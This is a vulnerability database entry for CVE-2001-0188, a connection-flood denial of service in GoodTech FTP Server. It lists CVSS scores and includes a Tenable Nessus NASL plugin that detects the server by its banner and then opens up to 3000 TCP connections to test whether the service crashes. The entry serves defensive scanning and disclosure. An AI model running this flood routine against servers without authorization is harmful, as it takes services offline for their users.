Vulnerabilities > CVE-2001-0188 - Unspecified vulnerability in Goodtech FTP Server 95 98 and FTP Server NT 2000

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
goodtech
nessus

Summary

GoodTech FTP server 3.0.1.2.1.0 and earlier allows remote attackers to cause a denial of service via a flood of connections to the server, which causes it to crash.

Vulnerable Configurations

Part Description Count
Application
Goodtech
2

Nessus

NASL familyFTP
NASL idGOODTECH_FTPD_DOS.NASL
descriptionThe remote host appears to be running GoodTech FTP Server for Windows. It was possible to disable the remote FTP server by connecting to it about 3000 separate times. If the remote server is running from within [x]inetd, this is a feature and the FTP server should automatically be back in a couple of minutes. An attacker may use this flaw to prevent this service from working properly.
last seen2020-06-01
modified2020-06-02
plugin id10690
published2001-06-15
reporterThis script is Copyright (C) 2001-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10690
titleGoodTech FTP Server Connection Saturation DoS
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if(description)
{
 script_id(10690);
 script_version ("1.30");
 script_cve_id("CVE-2001-0188");
 script_bugtraq_id(2270);
 
 script_name(english:"GoodTech FTP Server Connection Saturation DoS");

 script_set_attribute(attribute:"synopsis", value:
"The remote ftp server is prone to denial of service attacks." );
 script_set_attribute(attribute:"description", value:
"The remote host appears to be running GoodTech FTP Server for Windows. 

It was possible to disable the remote FTP server by connecting to it
about 3000 separate times.  If the remote server is running from
within [x]inetd, this is a feature and the FTP server should
automatically be back in a couple of minutes.  An attacker may use
this flaw to prevent this service from working properly." );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2001/Jan/329" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to a version of GoodTech FTP server later than 3.0.1.2.1.0." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"plugin_publication_date", value: "2001/06/15");
 script_set_attribute(attribute:"vuln_publication_date", value: "2001/01/22");
 script_cvs_date("Date: 2018/11/15 20:50:22");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 
 script_summary(english:"connections attempts overflow");
 script_category(ACT_FLOOD);
 script_copyright(english:"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.");
 script_family(english:"FTP");
 script_dependencie("ftpserver_detect_type_nd_version.nasl");
 script_require_ports("Services/ftp", 21);
 exit(0);
}

#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("ftp_func.inc");

port = get_ftp_port(default: 21);

b = get_ftp_banner(port: port);
if ( "GoodTech" >!< b ) exit(0);

  for(i=0;i<3000;i=i+1)
  {
   soc = open_sock_tcp(port);
   if(!soc)
   {
    if (i == 0) exit(1, "Cannot connect to TCP port "+port+".");
    if (service_is_dead(port: port) > 0)
      security_warning(port);
    i = 3001;
    exit(0);
   }
   close(soc);
  }